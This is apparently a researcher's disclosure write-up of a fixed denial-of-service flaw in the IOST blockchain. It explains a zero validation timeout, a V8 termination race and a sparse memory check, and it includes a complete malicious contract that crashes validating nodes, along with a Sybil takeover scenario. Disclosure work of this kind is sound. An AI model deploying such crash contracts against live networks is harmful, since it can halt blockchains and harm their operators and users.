Welcome back. Today we return to IOST. As we mentioned before, the IOST team contacted us and we have been working together since. Today's report covers an already fixed vulnerability that allowed an attacker to critically damage the whole network just by sending calls to a specially crafted contract.
The proof of knowledge is provided at the end of the article as usual for already fixed vulnerabilities.
Before we start, let's quickly mention Nebulas. There has been no official reaction. The team pretends nothing is going on, and no effort has been made to fix the vulnerability we discovered or to contact us. Unofficially, a Nebulas subreddit moderator said that the developers communicate with him and claim that the bug exists, but not really. Such a conclusion does not make much sense, as we explain in our discussion with the moderator.
Exhausting VM Memory With Timed Out Transaction
Bug type: DoS
Bug severity: 7/10
Scenario 1
Attacker cost: very low
In this scenario the attacker's goal is to halt the network. The attacker crashes all public nodes in the system, after which the network becomes dysfunctional. In order to do that, the attacker creates a special transaction and propagates it to the network. When the transaction is put into the block, all nodes that attempt to validate the block crash.
Scenario 2
Attacker cost: medium
In this scenario, the attacker performs a Sybil attack against the network: she sets up a large number of public nodes. She then performs the Scenario 1 attack repeatedly, until all public nodes of other operators are offline. When this happens, the attacker has full control over the traffic in the network and can therefore decide which transactions and which blocks are propagated to other nodes. This allows the attacker to perform various additional attacks. For example, the attacker can censor blocks from a specific miner in order to have that miner punished for not producing blocks.
Description
The codebase state at the time of writing can be seen here.
IOST implements smart contract functionality using the V8 JavaScript engine from Google. This allows users of IOST to deploy smart contracts written in JavaScript. However, V8 by itself is not suitable for consensus-critical operation, for example because it does not guarantee deterministic execution.
This is why IOST implemented a lot of restrictions on top of V8. Two such restrictions are relevant to this report: the contract execution time limit and the contract execution memory limit. A contract's execution must end within a certain time limit, otherwise the contract is forcefully terminated. We can see the management thread loop that periodically checks the time limit in sandbox.cc. This loop checks whether the execution of the contract has finished successfully, failed with an exception, exceeded the gas limit, or run over the time limit.
We can also see that the memory usage check in this loop is commented out. Instead it can be found elsewhere, at every 10th execution of IOSTContractInstruction_Incr(). The contracts to be executed are analyzed and calls to IOSTContractInstruction_Incr() are injected literally everywhere in them in order to calculate gas usage as well as to enforce the memory usage limit. The memory limit is set to 100 MB.
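The accounting hook described above can be pictured with a small model. This is a minimal sketch in JavaScript, not IOST's actual code: makeMeter, getHeapUsage, stats and the exact byte value of the limit are assumptions made for illustration. Only the 100 MB limit and the every-10th-call rule come from the description above.

```javascript
// Hypothetical model of the injected accounting hook. Only the 100 MB limit
// and the "check on every 10th call" rule come from the article; every name
// here is made up for illustration.
const MEMORY_LIMIT_BYTES = 100 * 1024 * 1024; // assumes 1 MB = 2^20 bytes
const CHECK_INTERVAL = 10;

// getHeapUsage is an assumed callback returning the current heap size in bytes.
function makeMeter(getHeapUsage) {
  let calls = 0;
  let gasUsed = 0;
  return {
    // Stand-in for IOSTContractInstruction_Incr(): it always charges gas,
    // but looks at memory only on every 10th invocation.
    incr(gas) {
      gasUsed += gas;
      calls += 1;
      if (calls % CHECK_INTERVAL === 0 && getHeapUsage() > MEMORY_LIMIT_BYTES) {
        throw new Error("memory limit exceeded");
      }
    },
    // Snapshot of the counters, useful for inspecting the model.
    stats() {
      return { calls, gasUsed };
    },
  };
}
```

In this model, heap growth that happens between two checks stays invisible until the call counter reaches the next multiple of ten.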
What happens when a transaction's execution does not end within the time limit? The miner includes the transaction in a block and marks it as timed out in its receipt. The block is then propagated to all of the miner's peers. However, validators do not process timed out transactions the same way the miner did. We can see the logic in the verify function:
if r.Status.Code == tx.ErrorTimeout {
    if blk.Head.Rules().IsFork3_0_10 {
        to = 0
    } else {
        to = timeout / 2
    }
} else {
    to = timeout * 2
}
This code says that, because fork 3.0.10 is already active, the time limit on the validator's side is set to 0 whenever the transaction is marked as timed out. So instead of the original 200 ms timeout for transaction execution, validators use a timeout of 0 ms. This is probably meant to make the validator reliably reach the same conclusion as the miner, i.e. that the execution timed out. However, the zero value is very problematic due to the logic in the management thread. Have a look there again:
std::thread exec(RealExecute, ptr, code, std::ref(result), std::ref(error), std::ref(isJson), std::ref(isDone));
ValueTuple res = { {nullptr, 0}, {nullptr, 0}, isJson, 0 };
// auto startTime = std::chrono::steady_clock::now();
while(true) {
    ...
    auto now = std::chrono::duration_cast<std::chrono::nanoseconds>(std::chrono::system_clock::now().time_since_epoch()).count();
    //auto execTime = std::chrono::duration_cast<std::chrono::milliseconds>(now - startTime).count();
    if (now > expireTime) {
        isolate->TerminateExecution();
        copyString(res.Err, ("execution killed, current time : " + std::to_string(now) + " , expireTime: " + std::to_string(expireTime)).c_str());
        res.gasUsed = sbx->gasUsed;
        break;
    }
    //usleep(10);
    std::this_thread::sleep_for(std::chrono::microseconds(10));
}
if (exec.joinable())
    exec.join();
First, a new thread is created to run RealExecute(), the function that executes scripts inside the V8 engine. The loop then waits until one of the monitored events happens, such as the time limit being exceeded. After that, join() is called to wait for the thread running RealExecute() to finish. When the time limit is exceeded, isolate->TerminateExecution() is called to terminate the execution of the script in V8.
The problem is that with the timeout set to 0 for timed out transactions, the time limit check triggers on the very first pass, the loop exits, and join() is invoked. All of this very likely happens before the operating system has scheduled the new thread for RealExecute(). isolate->TerminateExecution() is therefore called too early, before V8 has actually started executing, and the termination attempt has no effect. The management thread then simply waits in join() for the new thread to complete, which means that no time limit or gas limit checks are performed during the actual execution of the JavaScript contract inside RealExecute(). Note, however, that the memory usage check is still operational because it no longer lives in the management loop, where it was commented out.
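The ordering problem can be reproduced in a deterministic toy model. The sketch below is written in JavaScript for brevity and is not the V8 API: ToyIsolate, validate and validatorTimeout are hypothetical names, one loop step stands for one millisecond, and the model simply assumes the worst case from the description above, namely that a termination request made before the script starts running is lost. validatorTimeout is a port of the Go branch shown earlier.

```javascript
// Port of the Go branch shown earlier; the parameter names are assumptions.
function validatorTimeout(markedTimedOut, isFork3_0_10, timeoutMs) {
  if (markedTimedOut) {
    return isFork3_0_10 ? 0 : timeoutMs / 2;
  }
  return timeoutMs * 2;
}

// Toy stand-in for a V8 isolate, NOT the V8 API. It encodes the behaviour
// described in the text: a termination request only affects a running script.
class ToyIsolate {
  constructor() {
    this.running = false;
    this.interrupted = false;
  }
  terminateExecution() {
    if (this.running) this.interrupted = true; // otherwise the request is lost
  }
  // Runs up to `steps` units of work. `watchdog(elapsedMs)` models the
  // management loop observing the script while it runs (1 step = 1 ms).
  run(steps, watchdog) {
    this.running = true;
    let executed = 0;
    while (executed < steps && !this.interrupted) {
      executed += 1;
      if (watchdog) watchdog(executed);
    }
    this.running = false;
    return executed;
  }
}

// Returns how many steps the script gets to execute under a given timeout.
function validate(steps, timeoutMs) {
  const isolate = new ToyIsolate();
  if (timeoutMs === 0) {
    // First loop iteration: the deadline has already passed, the worker has
    // not been scheduled yet, so the request is lost and the loop exits.
    isolate.terminateExecution();
    return isolate.run(steps, null); // join(): nobody is watching any more
  }
  // Non-zero timeout: the loop is still polling when the deadline passes.
  return isolate.run(steps, (elapsedMs) => {
    if (elapsedMs >= timeoutMs) isolate.terminateExecution();
  });
}
```

With a 200 ms base timeout, validate(1000, validatorTimeout(true, true, 200)) runs all 1000 steps, whereas validate(1000, validatorTimeout(false, true, 200)) is stopped after 400. In the model, the shortest possible timeout is the only one that never terminates the script.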
Malicious Contract Code
Let's consider the following contract code:
class Contract {
    init() {}
    doom() {
        for (let i = 0; i < 1000000; i++) {
            IOSTCrypto.sha3("1");
        };
        let s1 = "a".repeat(1000000000);
        let s2 = "b".repeat(1000000000);
        let s3 = "c".repeat(1000000000);
        return "OK! " + s1 + s2.charAt(18) + s3.charAt(77);
    }
}
module.exports = Contract;
This contract is specially designed to exploit the combination of issues described above. The first part of the doom() function calls the CPU-intensive IOSTCrypto.sha3() function so many times that it cannot complete in time for the miner who attempts to create a new block, yet it does not cause an out-of-gas exception. Therefore, the transaction is marked as timed out and added to the block. The block is then propagated and validated by the miner's peers. Because of the zero timeout issue described above, time and gas limits are not enforced during validation, so the first part runs to completion on the validators. The second part is designed to cause an out-of-memory condition in V8, where the heap limit is set to about 1.4 GB on 64-bit machines. This must be done carefully because we have to bypass the memory usage check in IOSTContractInstruction_Incr() described above. This is possible because we know that the check is only executed on every 10th call to IOSTContractInstruction_Incr(). The code of our contract above achieves that with the help of very large objects: strings 1 GB long.
Therefore, such a call to doom() crashes the V8 engine due to an out-of-memory condition. This in turn crashes the node, which shares its process with the V8 engine.
Proof of Knowledge
As usual in the case of already fixed bugs, we should present proof that we were aware of the bug before it was fixed. We do that with the help of OpenTimestamps. Our timestamp data is the following string:
art_of_bug - IOST - Contract call transactions that are terminated by a miner due to timeout can be designed to crash the nodes that attempt to validate blocks that include such transactions. This is caused by an incorrect logic responsible for termination of the V8 engine in combination with an incorrect validation time limit settings for timed out transactions.
The OTS file proving our knowledge converted to hex looks as follows:
004f70656e54696d657374616d7073000050726f6f6600bf89e2e884e8929401083318503cd34bbcfae46c7e53afd8f51b9b7d6894b6969ace4dc838879849787ef01099f568a76a28f3833e9d5f199a84b67908fff0100ba4a74a4019dca83f171fac4c0550b808f1045e6a5ccbf008911819d8dd0f44c60083dfe30d2ef90c8e2e2d68747470733a2f2f616c6963652e6274632e63616c656e6461722e6f70656e74696d657374616d70732e6f7267fff01078798bfb5b30a0c2200b6b9e28c7dbf108f020e1a5e08ce4e1131a14fd1bbe46beb77c8c9a83c0a07cd14a75556c76ab8e403908f1045e6a5cccf008a615eae9700634c50083dfe30d2ef90c8e2c2b68747470733a2f2f626f622e6274632e63616c656e6461722e6f70656e74696d657374616d70732e6f7267f010c281ba9a0258b43a191a1cfb7b01e51008f1045e6a5ccbf0080baea69a81a77c820083dfe30d2ef90c8e292868747470733a2f2f66696e6e65792e63616c656e6461722e657465726e69747977616c6c2e636f6d
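For readers who want to look inside the hex dump before running a client, the following is a minimal sketch of how its first bytes can be decoded. It assumes the detached timestamp layout used by the OpenTimestamps reference client as we understand it: a 31-byte magic header, a version byte, a one-byte hash operation tag (0x08 for SHA-256) and then the 32-byte digest of the timestamped data. PREFIX_HEX and parseOtsPrefix are illustrative names, and the code relies on the Buffer global from Node.js.

```javascript
// First 65 bytes of the hex dump above: magic header, version, hash op, digest.
const PREFIX_HEX =
  "004f70656e54696d657374616d7073000050726f6f6600bf89e2e884e8929401" +
  "08" +
  "3318503cd34bbcfae46c7e53afd8f51b9b7d6894b6969ace4dc838879849787e";

// Assumed layout (see the lead-in): 31-byte magic, then the version byte.
const MAGIC_LEN = 31;
const DIGEST_LEN = 32;

// Splits the prefix of a detached timestamp file into its fields.
function parseOtsPrefix(hex) {
  const bytes = Buffer.from(hex, "hex");
  return {
    // Bytes 1..14 of the magic spell out the format name in ASCII.
    label: bytes.subarray(1, 15).toString("ascii"),
    version: bytes[MAGIC_LEN],
    hashOp: bytes[MAGIC_LEN + 1],
    digestHex: bytes
      .subarray(MAGIC_LEN + 2, MAGIC_LEN + 2 + DIGEST_LEN)
      .toString("hex"),
  };
}
```

Under that assumption, the digestHex field is the value that should correspond to the SHA-256 hash of the timestamp string above, and the remaining bytes of the file describe the path from that digest to the calendar servers.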
If you run the OpenTimestamps client correctly, you should see something like this:
This proves that we created the record on 12th March 2020, well before the fix was implemented on 22nd May.